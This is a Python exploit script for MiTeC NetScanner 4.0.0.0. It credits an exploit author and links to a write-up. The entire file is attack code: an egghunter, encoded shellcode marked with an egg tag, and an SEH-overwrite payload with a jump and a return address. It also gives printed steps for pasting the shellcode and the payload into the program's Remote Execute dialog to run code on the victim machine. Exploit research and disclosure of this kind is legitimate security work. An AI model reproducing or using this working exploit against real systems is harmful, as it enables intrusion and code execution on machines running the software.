#!/usr/bin/env python3
"""
NetScanner 4.0.0.0 exploit.

Vulnerable Software: NetScanner
Vendor: MiTeC
Version: 4.0.0.0
Exploit Author: Andres Roldan
Tested On: Windows Vista Business 32 bits
Writeup: https://fluidattacks.com/blog/netscan-exploit/
"""

EGGHUNTER = b""
EGGHUNTER += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
EGGHUNTER += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x6f\x73\x63\x65"
EGGHUNTER += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

SHELL = (
    b"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyl"
    b"yxmREPuPc0CPoyYutqkpPdlKrptpnk1B6lLK1BFtNkCBdhVonWaZTf"
    b"VQkOLlWLcQ1lS2VLUpzajovmwqKwIr8rrr1GnkBrTPLKRjgLLKrlR1"
    b"ahHcCxS18QsankPY5p5QXSNkpIUHIsGJBiLKFTlKwqiFFQkOLlJaxO"
    b"4MeQO708ip2UyfVccMxxGKcMUtt5ytqHNkv8a4318SSVnk6lpKlKBx"
    b"gl7q8SlK4DLK7qJpMYG4UtEtSkskQqv92z0QyoipaOSocjlKVrXknm"
    b"CmCXUcfRS0EPaxD7PsTrSoaD0hpLRW5vVgYozulxNp5QeP7p6IiTrt"
    b"bpsXWYmP0k5PkOiEV0BpRpv0g00P3p0PsXZJ6oKoYpkOjuogPjeUe8"
    b"o0y8eP7b0huRGpga1LMYM60jvprv3gaxLYy5SD1qKOHUk5iPd4TLKO"
    b"rnFhrUHlBHjPMenBV6kOxUaxsS2McT7poyis0Wsgv7eakFrJWbSiRv"
    b"yrImU6kwW4fD7LWqc1lMctddvpjfgppDqDpPrvPV1FaV2vRn66aFpS"
    b"pVaxT9ZlUoMV9oXUlIypPNBvSvIotpqx5XMW5MCPyoYEmklj8E9raM"
    b"CXlfnummomyoYEelEVQl7zMPykIpRUveoK3wGcT2RO0j30BskOxUAA"
)

PAYLOAD = (
    # Initial padding
    b"A" * 8
    + EGGHUNTER
    + b"A" * (76 - 8 - len(EGGHUNTER))
    +
    # nSEH
    b"\xeb\xb4\x41\x41"
    +
    # 00407119  |. 59             POP ECX
    # 0040711A  |. 5D             POP EBP
    # 0040711B  \. C2 0400        RETN 4
    b"\x19\x71\x40"
)

print("[*] Please, paste the following text on:")
print("[*] TOOLS -> Remote Execute... -> Command line")
print("")
print(f"osceosce{SHELL.decode()}")
print("")
print("[*] Now paste the exploit payload.")

with open("exploit.txt", "wb") as fd:
    fd.write(PAYLOAD)